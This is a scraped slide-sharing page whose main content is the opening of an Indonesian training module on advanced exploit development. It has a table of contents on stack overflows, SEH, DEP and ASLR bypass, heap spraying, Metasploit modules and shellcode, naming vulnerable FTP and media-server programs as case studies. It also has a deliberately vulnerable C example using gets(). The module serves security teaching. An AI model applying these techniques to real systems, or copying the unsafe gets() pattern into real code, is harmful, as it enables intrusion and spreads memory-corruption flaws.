Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 

Syllabus Advanced Exploit Development 22-23 June 2013

  • 1. HATSECURE TRAINING #SESSION-1 ADVANCED EXPLOIT DEVELOPMENT Danang Heriyadi danang@hatsecure.com Copyright By Hatsecure Advanced Exploit Development
  • 2. Disclaimer Dilarang merubah isi modul dan menggandakan modul ini tanpa seijin penulis Copyright By Hatsecure Copyright By Hatsecure Advanced Exploit Development
  • 3. Table of Contents Introduction......................................................................................................... 1 0x01 Classic stack overflow....................................................................... 2 Objective................................................................................................ 2 Overview.................................................................................................... 2 Exercise....................................................................................................... 2 Free float FTP Vulnerability................................................................... 3 Fuzzing : Crash the service............................................................... 3 Fuzzing : Finding the Right Offset to EIP.......................................... 3 Controlling the EIP........................................................................... 3 Take over the victim.......................................................................... 3 Conclusion.............................................................................................. 3 0x02 Bypassing Structured Exception Handling.................................. 3 Objective................................................................................................ 3 Overview........................................................................................... 3 Structured Exception Handling......................................................... 3 SEH / Safe SEH Bypassing Theory.................................................... 3 Testing SEH / SafeSEH protection.................................................... 3 Exercise............................................................................................. 3 All Media Server Vulnerability................................................................ 3 Module intruction mapping................................................................ 3 Returning into our shellcode............................................................. 3 Conclusion.............................................................................................. 3 0x03 Bypassing Data Exception Prevention.......................................... 3 Objective................................................................................................ 3 Overview........................................................................................... 3 Copyright By Hatsecure Advanced Exploit Development
  • 4. Data Exception Prevention................................................................ 3 DEP Bypassing theory....................................................................... 3 Testing DEP Protection..................................................................... 3 Case Of study : Sami FTP Vulnerability................................................. 3 Return Oriented Programming.......................................................... 3 Defeating DEP with ROP.................................................................. 3 Returning into our shellcode............................................................. 3 Conclusion.............................................................................................. 3 0x03 Bypassing ASLR in windows 7......................................................... 3 Objective................................................................................................ 3 Overview........................................................................................... 3 Address Space Layout Randomization.............................................. 3 ASLR bypass theory.......................................................................... 3 0x04 Heap Memory Exploitation............................................................... 3 Objective................................................................................................ 3 Overview........................................................................................... 3 Heap Memory Layout........................................................................ 3 Case Of Study : Heap Spraying Internet Explorer................................. 3 Heap Spray Technique....................................................................... 3 Triggering Vulnerability..................................................................... 3 Returning into heap buffer................................................................ 3 Conclusion.............................................................................................. 3 0x05 Metasploit Module Development................................................... 3 Objective................................................................................................ 3 Overview........................................................................................... 3 Convert your exploit to metasploit module...................................... 3 Copyright By Hatsecure Advanced Exploit Development
  • 5. 0x06 Shellcode Development..................................................................... 3 Objective................................................................................................ 3 Overview........................................................................................... 3 Software Required............................................................................ 3 Windows API.................................................................................... 3 Static Shellcode Writing......................................................................... 3 Message Box..................................................................................... 3 Windows Execute............................................................................. 3 Combination shellcode...................................................................... 3 Convert your shellcode to metasploit module................................. 3 Shellcode Injection with metasploit....................................................... 3 Reporting................................................................................................ 3 Copyright By Hatsecure Advanced Exploit Development
  • 6. Introduction Exploit adalah suatu script yang menyerang melalui celah keamanan komputer secara spesifik. Dalam exploit terkadang ditemukan suatu shellcode, shellcode inilah yang menjadi suatu amunisi dari tool exploit. Tool exploit bukan hal yang asing oleh seseorang yang menjadi praktisi keamanan. Tool ini bisa digunakan untuk menguji keamanan secara legal. Pada training “advanced exploit development” ini kita akan membahas dan mengupas bagaimana seorang praktisi keamanan mencari celah keamanan, membuat dan mengembangkan exploit. Copyright By Hatsecure Advanced Exploit Development
  • 7. 0x01 Classic Stack Overflow Objective • Memahami konsep stack overflow • Memahami metode debugging • Memahami metode fuzzing atau fuzz testing • Mampu mengeksploitasi celah stack overflow Overview Celah basis stack overflow terjadi ketika software melakukan penulisan data melebihi kapasitas buffer. Sehingga data yang melebihi tersebut akan merubah nilai yang ada dalam register memory. Contoh source code yang memiliki celah stack overflow : Source code diatas ketika kita kompilasi dan eksekusi.Kita hanya dapat mengisi data maksimal 20 karakter dan apabila lebih dari 20 karakter, data yang kita masukkan akan merubah nilai yang ada dalam register memory. Exercise Cobalah untuk mengulang hingga memahami konsep dan eksploitasi stack overflow Copyright By Hatsecure Advanced Exploit Development #include <stdio.h> int main(){ char data[20]; printf(“Masukkan data : “); gets(data); return 0; }